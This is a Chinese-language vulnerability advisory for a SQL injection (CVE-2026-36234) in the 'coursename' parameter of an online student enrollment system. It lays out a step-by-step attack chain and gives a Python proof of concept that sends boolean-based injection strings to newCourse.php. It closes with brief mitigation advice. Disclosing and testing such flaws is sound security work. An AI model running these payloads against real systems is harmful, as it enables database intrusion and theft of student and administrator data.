CVE-2026-36234 itsourcecode在线招生系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-36234

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Student Enrollment System

漏洞概述

itsourcecode Online Student Enrollment System v1.0版本中存在严重的SQL注入漏洞。由于newCourse.php文件对'coursename'参数缺乏有效的过滤，攻击者无需认证即可通过构造恶意SQL语句执行攻击。该漏洞可能导致数据库敏感信息泄露、数据被篡改或删除，严重威胁系统安全。

技术细节

该漏洞源于应用程序在构建SQL查询时，未对用户输入的'coursename'参数进行严格的类型检查或转义处理。在newCourse.php页面处理课程添加请求时，攻击者可以注入单引号或其他SQL元字符来改变原始查询逻辑。由于CVSS评分显示无需用户交互（UI:N）且无需认证（PR:N），远程攻击者可直接向服务器发送特制的HTTP请求。利用方式包括基于布尔的盲注、联合查询注入或时间盲注，从而绕过应用逻辑直接操作后端数据库，获取敏感数据或执行系统命令。

攻击链分析

STEP 1

1. 信息收集

攻击者使用扫描工具或手动侦察，确认目标站点运行的是itsourcecode Online Student Enrollment System v1.0，并定位到newCourse.php入口。

STEP 2

2. 漏洞探测

攻击者在'coursename'参数中输入单引号或特定的SQL语法（如' AND 1=1），观察服务器响应是否出现数据库错误或页面内容差异，从而确认SQL注入点的存在。

STEP 3

3. 构造攻击Payload

确认漏洞存在后，攻击者利用UNION SELECT语句或布尔盲注技术构造恶意Payload，旨在提取数据库表名、列名或管理员账号密码等敏感信息。

STEP 4

4. 执行攻击与数据获取

将构造好的Payload通过HTTP POST请求发送至服务器，后端数据库执行恶意命令，并将查询结果返回给攻击者，导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-36234
# Target: itsourcecode Online Student Enrollment System v1.0
# Vulnerable File: newCourse.php
# Vulnerable Parameter: coursename

import requests

def check_sqli(url):
    # Target endpoint
    target = f"{url}/newCourse.php"
    
    # Payload to test for SQL Injection (Boolean-based)
    # Checks if the query returns True (1=1) vs False (1=2)
    payload_true = "test' OR '1'='1"
    payload_false = "test' OR '1'='2"
    
    data = {
        "coursename": payload_true
    }
    
    try:
        print(f"[*] Sending payload to {target}...")
        response = requests.post(target, data=data)
        
        # Analyze response (logic depends on application behavior)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check application response for differences.")
            print(f"[+] Response Length (True): {len(response.text)}")
            
            # Send False payload for comparison
            data['coursename'] = payload_false
            response_false = requests.post(target, data=data)
            print(f"[-] Response Length (False): {len(response_false.text)}")
            
            if len(response.text) != len(response_false.text):
                print("[!] Potential SQL Injection found via response length difference.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target_url = "http://target-ip" # Replace with actual target IP
    check_sqli(target_url)

影响范围

itsourcecode Online Student Enrollment System v1.0

防御指南

临时缓解措施

在官方发布安全补丁前，建议通过在服务器端（如PHP代码）添加输入过滤函数来临时阻断特殊字符（如单引号、双引号、注释符等），或者暂时禁用newCourse.php页面的访问权限以防止攻击。